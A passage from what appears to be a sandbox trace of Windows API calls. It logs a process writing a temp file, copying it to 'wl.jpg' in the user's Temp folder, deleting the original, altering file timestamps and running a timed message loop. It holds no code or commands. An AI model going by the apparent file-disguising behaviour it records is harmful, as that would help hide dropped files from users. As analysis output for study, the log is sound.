lpOverlapped=0x0) returned 1 [0224.511] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bdb68, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8bdb68*=0x635, lpOverlapped=0x0) returned 1 [0224.513] WriteFile (in: hFile=0x4e0, lpBuffer=0x8bee48*, nNumberOfBytesToWrite=0xb000, lpNumberOfBytesWritten=0x8bc0dc, lpOverlapped=0x0 | out: lpBuffer=0x8bee48*, lpNumberOfBytesWritten=0x8bc0dc*=0xb000, lpOverlapped=0x0) returned 1 [0224.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1000) returned 0x385b068 [0224.514] WriteFile (in: hFile=0x4e0, lpBuffer=0x385b068*, nNumberOfBytesToWrite=0x189, lpNumberOfBytesWritten=0x8bc0ec, lpOverlapped=0x0 | out: lpBuffer=0x385b068*, lpNumberOfBytesWritten=0x8bc0ec*=0x189, lpOverlapped=0x0) returned 1 [0224.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x385b068 | out: hHeap=0x2af0000) returned 1 [0224.514] CloseHandle (hObject=0x4e0) returned 1 [0224.519] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\autD9D3.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\autd9d3.tmp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\wl.jpg"), bFailIfExists=0) returned 1 [0224.539] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\autD9D3.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\autd9d3.tmp")) returned 1 [0224.542] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\wl.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0224.542] SetFileTime (hFile=0x4e0, lpCreationTime=0x8bdcb0, lpLastAccessTime=0x0, lpLastWriteTime=0x8bdcb8) returned 1 [0224.542] CloseHandle (hObject=0x4e0) returned 1 [0224.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854008 | out: hHeap=0x2af0000) returned 1 [0224.542] CloseHandle (hObject=0x520) returned 1 [0224.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0224.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0224.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0224.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0224.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0224.545] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0224.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0224.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0224.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0224.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0224.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0224.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0224.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0224.546] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0224.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0224.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0224.547] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0224.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0224.547] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0224.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb318 [0224.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0224.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0224.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0224.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0224.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb318 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.548] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0224.549] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0224.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0224.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0224.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0224.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0224.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0224.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0224.549] timeGetTime () returned 0x1178281 [0224.549] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.549] Sleep (dwMilliseconds=0xa) [0224.574] timeGetTime () returned 0x11782a0 [0224.574] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.574] Sleep (dwMilliseconds=0xa) [0224.597] timeGetTime () returned 0x11782af [0224.597] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.597] Sleep (dwMilliseconds=0xa) [0224.627] timeGetTime () returned 0x11782cf [0224.627] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.627] Sleep (dwMilliseconds=0xa) [0224.652] timeGetTime () returned 0x11782ee [0224.652] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.652] Sleep (dwMilliseconds=0xa) [0224.670] timeGetTime () returned 0x11782fd [0224.670] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.670] Sleep (dwMilliseconds=0xa) [0224.698] timeGetTime () returned 0x117831d [0224.698] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.698] Sleep (dwMilliseconds=0xa) [0224.719] timeGetTime () returned 0x117832c [0224.719] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.719] Sleep (dwMilliseconds=0xa) [0224.746] timeGetTime () returned 0x117834c [0224.746] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.746] Sleep (dwMilliseconds=0xa) [0224.761] timeGetTime () returned 0x117835b [0224.761] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.761] Sleep (dwMilliseconds=0xa) [0224.775] timeGetTime () returned 0x117836b [0224.775] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.775] Sleep (dwMilliseconds=0xa) [0224.798] timeGetTime () returned 0x117837a [0224.798] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.798] Sleep (dwMilliseconds=0xa) [0224.821] timeGetTime () returned 0x117839a [0224.821] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.821] Sleep (dwMilliseconds=0xa) [0224.846] timeGetTime () returned 0x11783a9 [0224.846] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.846] Sleep (dwMilliseconds=0xa) [0224.868] timeGetTime () returned 0x11783c9 [0224.868] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.868] Sleep (dwMilliseconds=0xa) [0224.887] timeGetTime () returned 0x11783d8 [0224.887] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.887] Sleep (dwMilliseconds=0xa) [0224.899] timeGetTime () returned 0x11783e8 [0224.899] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.899] Sleep (dwMilliseconds=0xa) [0224.919] timeGetTime () returned 0x11783f8 [0224.919] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0224.919] TranslateMessage (lpMsg=0x8cf798) returned 0 [0224.919] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0224.919] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0224.919] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0224.919] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.919] Sleep (dwMilliseconds=0xa) [0224.931] timeGetTime () returned 0x1178407 [0224.931] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.931] Sleep (dwMilliseconds=0xa) [0224.946] timeGetTime () returned 0x1178417 [0224.946] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0224.946] Sleep (dwMilliseconds=0xa) [0225.005] timeGetTime () returned 0x1178446 [0225.005] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.005] Sleep (dwMilliseconds=0xa) [0225.025] timeGetTime () returned 0x1178465 [0225.025] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.025] Sleep (dwMilliseconds=0xa) [0225.040] timeGetTime () returned 0x1178474 [0225.040] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.040] Sleep (dwMilliseconds=0xa) [0225.056] timeGetTime () returned 0x1178484 [0225.056] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.056] Sleep (dwMilliseconds=0xa) [0225.072] timeGetTime () returned 0x1178494 [0225.072] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.072] Sleep (dwMilliseconds=0xa) [0225.087] timeGetTime () returned 0x11784a3 [0225.087] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.087] Sleep (dwMilliseconds=0xa) [0225.112] timeGetTime () returned 0x11784b3 [0225.112] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.112] Sleep (dwMilliseconds=0xa) [0225.135] timeGetTime () returned 0x11784d2 [0225.135] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.135] Sleep (dwMilliseconds=0xa) [0225.150] timeGetTime () returned 0x11784e2 [0225.150] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.150] Sleep (dwMilliseconds=0xa) [0225.167] timeGetTime () returned 0x11784f1 [0225.167] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.167] Sleep (dwMilliseconds=0xa) [0225.183] timeGetTime () returned 0x1178501 [0225.183] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.183] Sleep (dwMilliseconds=0xa) [0225.196] timeGetTime () returned 0x1178511 [0225.196] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.196] Sleep (dwMilliseconds=0xa) [0225.212] timeGetTime () returned 0x1178520 [0225.212] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.212] Sleep (dwMilliseconds=0xa) [0225.228] timeGetTime () returned 0x1178530 [0225.228] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.229] Sleep (dwMilliseconds=0xa) [0225.244] timeGetTime () returned 0x1178540 [0225.244] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.244] Sleep (dwMilliseconds=0xa) [0225.259] timeGetTime () returned 0x117854f [0225.259] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.259] Sleep (dwMilliseconds=0xa) [0225.276] timeGetTime () returned 0x117855f [0225.276] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.276] Sleep (dwMilliseconds=0xa) [0225.290] timeGetTime () returned 0x117856e [0225.290] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.290] Sleep (dwMilliseconds=0xa) [0225.305] timeGetTime () returned 0x117857e [0225.305] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.306] Sleep (dwMilliseconds=0xa) [0225.323] timeGetTime () returned 0x117858e [0225.323] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.323] Sleep (dwMilliseconds=0xa) [0225.338] timeGetTime () returned 0x117859d [0225.338] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.338] Sleep (dwMilliseconds=0xa) [0225.361] timeGetTime () returned 0x11785b4 [0225.361] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.361] Sleep (dwMilliseconds=0xa) [0225.384] timeGetTime () returned 0x11785cc [0225.384] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.384] Sleep (dwMilliseconds=0xa) [0225.399] timeGetTime () returned 0x11785dc [0225.399] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.399] Sleep (dwMilliseconds=0xa) [0225.415] timeGetTime () returned 0x11785eb [0225.415] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.415] Sleep (dwMilliseconds=0xa) [0225.430] timeGetTime () returned 0x11785fb [0225.430] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.430] Sleep (dwMilliseconds=0xa) [0225.448] timeGetTime () returned 0x117860b [0225.448] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.448] Sleep (dwMilliseconds=0xa) [0225.463] timeGetTime () returned 0x117861a [0225.463] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.463] Sleep (dwMilliseconds=0xa) [0225.478] timeGetTime () returned 0x117862a [0225.478] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.478] Sleep (dwMilliseconds=0xa) [0225.494] timeGetTime () returned 0x117863a [0225.494] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.494] Sleep (dwMilliseconds=0xa) [0225.509] timeGetTime () returned 0x1178649 [0225.509] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.509] Sleep (dwMilliseconds=0xa) [0225.524] timeGetTime () returned 0x1178659 [0225.524] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.524] Sleep (dwMilliseconds=0xa) [0225.540] timeGetTime () returned 0x1178668 [0225.540] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0225.540] Sleep (dwMilliseconds=0xa) [0225.555] timeGetTime () returned 0x1178678 [0225.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0225.556] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, 